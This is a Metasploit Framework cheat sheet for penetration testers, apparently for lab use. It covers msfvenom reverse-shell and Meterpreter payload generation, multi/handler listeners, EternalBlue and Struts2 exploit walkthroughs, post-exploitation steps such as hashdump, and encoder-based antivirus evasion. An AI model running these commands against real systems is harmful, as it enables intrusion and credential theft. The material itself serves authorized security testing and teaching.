Metasploit Framework Cheat Sheet

Modular exploitation framework for scanning, exploiting, and post-exploitation with msfconsole, handlers, and msfvenom.

Exploitation & PayloadsexploithandlermsfconsolemsfvenompayloadUpdated 2026-06-02

Overview

Metasploit Framework provides exploits, auxiliary modules, encoders, and payloads. msfconsole is the interactive CLI; msfvenom generates standalone payloads; exploit/multi/handler catches reverse connections. Use after service enumeration when you have a matching module or need staged shells.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Install

Kali / Parrot (preinstalled)

which msfconsole

Ubuntu — Rapid7 installer

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb -o msfinstall

chmod +x msfinstall && sudo ./msfinstall

Start PostgreSQL (required for db features)

sudo systemctl start postgresql

msfdb init

Essential commands

Interactive console

msfconsole -q

Search modules

msfconsole -q -x "search type:exploit platform:linux smb; exit"

Generate payload (msfvenom)

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f elf -o shell.elf

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.5 LPORT=443 -f exe -o rev.exe

List encoders / formats

msfvenom --list payloads | grep meterpreter

msfvenom --list formats

Inside msfconsole —

search eternalblue

use exploit/windows/smb/ms17_010_eternalblue

show options

set RHOSTS 192.168.1.10

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 10.10.14.5

set LPORT 4444

check

run -j

Database / workspace

workspace -a client_a

hosts -a 192.168.1.0/24

services -p 445

Common workflows

Terminal 1 — listener

msfconsole -q -x "use exploit/multi/handler; set payload linux/x64/shell_reverse_tcp; set LHOST 0.0.0.0; set LPORT 4444; run"

Or interactively

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 10.10.14.5

set LPORT 443

set ExitOnSession false

run -j

Exploit + payload in one session —

use exploit/multi/http/struts2_content_type_ognl

set RHOSTS target.htb

set RPORT 8080

set TARGETURI /

set payload linux/x64/meterpreter/reverse_tcp

set LHOST tun0

set LPORT 4444

run

After session opens

sessions -l

sessions -i 1

In meterpreter

sysinfo

getuid

hashdump

upload /local/path/tool.exe C:\\Windows\\Temp\

shell

background

Generate staged Windows HTTPS meterpreter

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.5 LPORT=443 -e x64/xor_dynamic -i 3 -f exe -o payload.exe

Handler must use same payload

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_https

set LHOST 10.10.14.5

set LPORT 443

run

exploit.rc

use exploit/windows/smb/ms17_010_eternalblue

set RHOSTS 192.168.1.50

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 10.10.14.5

set LPORT 4444

run

msfconsole -q -r exploit.rc

Flags reference

`msfconsole -q`	Quiet banner
`msfconsole -r file.rc`	Run resource script
`search type:exploit cve:2021`	Filter module search
`show targets`	Compatible target indexes
`setg LHOST ip`	Global option for all modules
`run -j`	Run as background job
`msfvenom -a x64 --platform windows`	Architecture / platform
`msfvenom -f raw`	Output format (elf, exe, ps1, etc.)

Tips

Always pair msfvenom payload type with handler payload exactly (staged vs stageless matters).
Use check before run when the module supports it to avoid crashing services.
setg LHOST on your VPN interface (e.g. tun0) saves time in labs.
For AV evasion, try encoders sparingly; modern EDR often flags msfvenom defaults — custom loaders may be required.
db_nmap imports Nmap results: db_nmap -sV 10.10.10.0/24 then services.